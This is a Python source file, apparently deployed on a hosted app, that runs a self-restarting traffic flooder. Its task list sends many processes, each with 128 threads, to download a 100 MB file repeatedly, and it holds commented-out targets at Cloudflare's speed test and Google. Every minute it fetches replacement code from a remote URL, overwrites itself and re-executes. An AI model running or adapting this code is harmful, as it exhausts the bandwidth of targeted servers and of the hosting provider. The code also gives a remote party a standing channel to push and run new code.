potato-bot / potato.py
RIaeXZkongsZFtB
Upload 4 files
227de8e
import hashlib
import concurrent.futures
import time
import http.server
import socketserver
import threading
import psutil
import traceback
import sys
import os
port = 7860
wait_second = 1
update_when_run_scripts = True # True 时启动时更新, False 启动后300s启动更新
script_name = "potato.py"
script_url = "https://potato.fuckgyz.eu.org/potato.py"
import_str = "psutil==5.9.1 requests==2.31.0 selenium==4.10.0"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0"
task_list = [
[
"get",
{
"process": 1,
"threads": 1,
"url": "http://6.6.6.6",
"headers": {
"User-Agent": user_agent,
# "Referer": "https://www.google.com",
# "Origin": "https://www.google.com",
# "Host": "www.google.com",
# "Cookies": "",
},
"data": {
# "key": "value",
}
}
],
[
"get",
{
"process": 8,
"threads": 128,
"url": "https://cache.fuckgyz.eu.org/100m.bin",
"headers": {
"User-Agent": user_agent,
# "Referer": "https://www.google.com",
# "Origin": "https://www.google.com",
# "Host": "www.google.com",
# "Cookies": "",
},
"data": {
# "key": "value",
}
}
],
# [
# "get",
# {
# "process": 8,
# "threads": 128,
# "url": "http://speed.cloudflare.com/__down?bytes=1145141919810",
# "headers": {
# "User-Agent": user_agent,
# # "Referer": "https://www.google.com",
# # "Origin": "https://www.google.com",
# # "Host": "www.google.com",
# # "Cookies": "",
# },
# "data": {
# # "key": "value",
# }
# }
# ],
# [
# "get",
# {
# "process": 1,
# "threads": 1,
# "url": "https://www.google.com",
# "headers": {
# "User-Agent": user_agent,
# # "Referer": "https://www.google.com",
# # "Origin": "https://www.google.com",
# # "Host": "www.google.com",
# # "Cookies": "",
# },
# "data": {
# # "key": "value",
# }
# }
# ],
]
task_get_data = {
"process": 8,
"threads": 128,
"url": "http://speed.cloudflare.com/__down?bytes=1145141919810",
"headers": {
"User-Agent": user_agent,
# "Referer": "https://www.google.com",
# "Origin": "https://www.google.com",
# "Host": "www.google.com",
# "Cookies": "",
},
"data": {
# "key": "value",
}
}
task_post_data = {
"process": 8,
"threads": 128,
"url": "https://www.google.com",
"headers": {
"User-Agent": user_agent,
# "Referer": "https://www.google.com",
# "Origin": "https://www.google.com",
# "Host": "www.google.com",
# "Cookies": "",
},
"data": {
# "key": "value",
}
}
task_browser_data = {
"process": 8,
"threads": 1,
"url": "https://www.google.com",
# "headers": {
# "User-Agent": user_agent,
# # "Referer": "https://www.google.com",
# # "Origin": "https://www.google.com",
# # "Host": "www.google.com",
# # "Cookies": "",
# },
# "data": {
# # "key": "value",
# }
}
task_workers = []
success = 0
failed = 0
total = 0
net_s1 = ""
net_s2 = ""
net_s3 = ""
net_s4 = ""
net_s5 = ""
def restart():
print("正在重启脚本")
# 结束子进程
for task in task_workers:
print(f"结束子进程:{str(task_workers.index(task))}")
try:
task.terminate()
except:
traceback.print_exc()
print(f"子进程结束失败!索引:{str(task_workers.index(task))}")
pass
print(f"子进程:{str(task_workers.index(task))} 结束成功")
# 重启脚本
print("开始重启主线程")
python = sys.executable
os.execl(python, python, *sys.argv)
def update():
import requests
i = 0
while True:
try:
if i == 0 and not update_when_run_scripts:
time.sleep(300)
i += 1
print("开始检查更新")
response = requests.get(script_url)
sha256_hash_old = hashlib.sha256(open(script_name, 'rb').read()).hexdigest()
sha256_hash_new = hashlib.sha256(response.content).hexdigest()
if sha256_hash_old == sha256_hash_new:
print(f"{str(sha256_hash_old)} == {str(sha256_hash_new)}")
print("已是最新版本")
time.sleep(60)
continue
print("发现新版本代码,开始更新")
print("写入到:" + script_name)
with open(script_name, 'wb') as file:
file.write(response.content)
print("写入成功\n重新运行脚本")
restart()
except:
traceback.print_exc()
print("更新出现错误")
time.sleep(60)
def import_init():
try:
import hashlib
import threading
import time
import traceback
import requests
import sys
import os
import selenium
except:
try:
print("部分依赖未安装,正在安装依赖")
os.system(f"pip install {import_str}")
print("依赖安装完成")
except:
print("依赖安装失败,请检查报错")
def get_worker(i, task_data):
import requests
def get():
global success
global failed
global total
with requests.get(task_data["url"], headers=task_data["headers"],
data=task_data["data"] if task_data["data"] != {} else None, stream=True) as r:
if r.status_code == requests.codes.ok:
for _ in r.iter_content(chunk_size=1048576):
pass
total += 1
if r.status_code == 200:
success += 1
else:
failed += 1
r.close()
def monitor():
while True:
print(f"Worker: {str(i)}, Success: {str(success)}, Failed: {str(failed)}, Total: {str(total)}")
print(f"Task URL: " + task_data["url"])
time.sleep(1)
print(f"get任务{str(i)}开始运行")
threading.Thread(target=monitor).start()
while True:
try:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=task_data["threads"])
while True:
if executor._work_queue.qsize() < executor._max_workers:
executor.submit(get)
else:
time.sleep(0.5)
except:
traceback.print_exc()
print("get任务运行出现错误,重试...")
time.sleep(1)
def post_worker(i, task_data):
import requests
def post():
global success
global failed
global total
with requests.post(task_data["url"], headers=task_data["headers"],
data=task_data["data"] if task_data["data"] != {} else None, stream=True) as r:
if r.status_code == requests.codes.ok:
for _ in r.iter_content(chunk_size=1048576):
pass
total += 1
if r.status_code == 200:
success += 1
else:
failed += 1
r.close()
def monitor():
while True:
print(f"Worker: {str(i)}, Success: {str(success)}, Failed: {str(failed)}, Total: {str(total)}")
print(f"Task URL: " + task_data["url"])
time.sleep(1)
print(f"post任务{str(i)}开始运行")
threading.Thread(target=monitor).start()
while True:
try:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=task_data["threads"])
while True:
if executor._work_queue.qsize() < executor._max_workers:
executor.submit(post)
else:
time.sleep(0.5)
except:
traceback.print_exc()
print("post任务运行出现错误,重试...")
time.sleep(1)
# def browser_worker():
# import requests
#
# while True:
# try:
# response = requests.get(task_get_data["url"], headers=task_get_data["headers"])
# return
# except:
# traceback.print_exc()
# print("get任务运行出现错误")
# time.sleep(1)
def do_task_worker(i, task):
import multiprocessing
global task_workers
print("开始运行线程:" + str(i))
kv = {
"get": get_worker,
"post": post_worker,
# "browser": browser_worker,
}
p_pool = []
for i in range(task[1]["process"]):
try:
print("开始运行任务:")
print(task[1])
p = multiprocessing.Process(target=kv[task[0]], args=(i, task[1]))
except:
print(f"未知的任务类型:{task[0]},请重新配置")
return
task_workers.append(p)
p_pool.append(p)
p.start()
for p in p_pool:
p.join()
print(f"线程:{str(i)}, 任务运行完成")
def monitor_network():
global net_s1
global net_s2
global net_s3
global net_s4
global net_s5
last_sent_bytes = psutil.net_io_counters().bytes_sent
last_recv_bytes = psutil.net_io_counters().bytes_recv
while True:
time.sleep(wait_second)
current_sent_bytes = psutil.net_io_counters().bytes_sent
current_recv_bytes = psutil.net_io_counters().bytes_recv
sent_bytes = current_sent_bytes - last_sent_bytes
sent_speed = psutil._common.bytes2human(int(sent_bytes / wait_second)) + "/s"
recv_bytes = current_recv_bytes - last_recv_bytes
recv_speed = psutil._common.bytes2human(int(recv_bytes / wait_second)) + "/s"
last_sent_bytes = current_sent_bytes
last_recv_bytes = current_recv_bytes
net_s1 = f"Total network traffic: {psutil._common.bytes2human(current_sent_bytes + current_recv_bytes)}"
net_s2 = f"Sent traffic in the last {str(wait_second)} seconds: " + psutil._common.bytes2human(sent_bytes)
net_s3 = "Sent speed: " + sent_speed
net_s4 = f"Received traffic in the last {str(wait_second)} seconds: {psutil._common.bytes2human(recv_bytes)}"
net_s5 = "Received speed: " + recv_speed
print("\n" + net_s1)
print(net_s2)
print(net_s3)
print(net_s4)
print(net_s5 + "\n")
def generate_tasks_page():
s = ""
for i in task_list:
s += i[0] + ": " + i[1]["url"] + "<br>"
return s
class MyRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
po_list_bytes = generate_tasks_page().encode(encoding='utf-8')
net_s1_bytes = net_s1.encode(encoding='utf-8')
net_s2_bytes = net_s2.encode(encoding='utf-8')
net_s3_bytes = net_s3.encode(encoding='utf-8')
net_s4_bytes = net_s4.encode(encoding='utf-8')
net_s5_bytes = net_s5.encode(encoding='utf-8')
self.wfile.write(
b"<html><body><h1>This is Potato Page!</h1><p>There is a po-ta-to list:</p><p>" + po_list_bytes + b"</p><p>" + net_s1_bytes + b"<br>" + net_s2_bytes + b"<br>" + net_s3_bytes + b"<br>" + net_s4_bytes + b"<br>" + net_s5_bytes + b"</p></body></html>")
def http_server_init():
with socketserver.TCPServer(("", port), MyRequestHandler) as httpd:
print("Server started at http://localhost:{}".format(port))
httpd.serve_forever()
def init():
threading.Thread(target=update).start()
threading.Thread(target=http_server_init).start()
threading.Thread(target=monitor_network).start()
import_init()
for i in range(len(task_list)):
threading.Thread(target=do_task_worker, args=(i, task_list[i])).start()
print("初始化成功")
while True:
time.sleep(60)
if __name__ == "__main__":
while True:
try:
init()
print("出现错误,重新运行")
time.sleep(1)
except:
traceback.print_exc()
print("出现错误,重新运行")
time.sleep(1)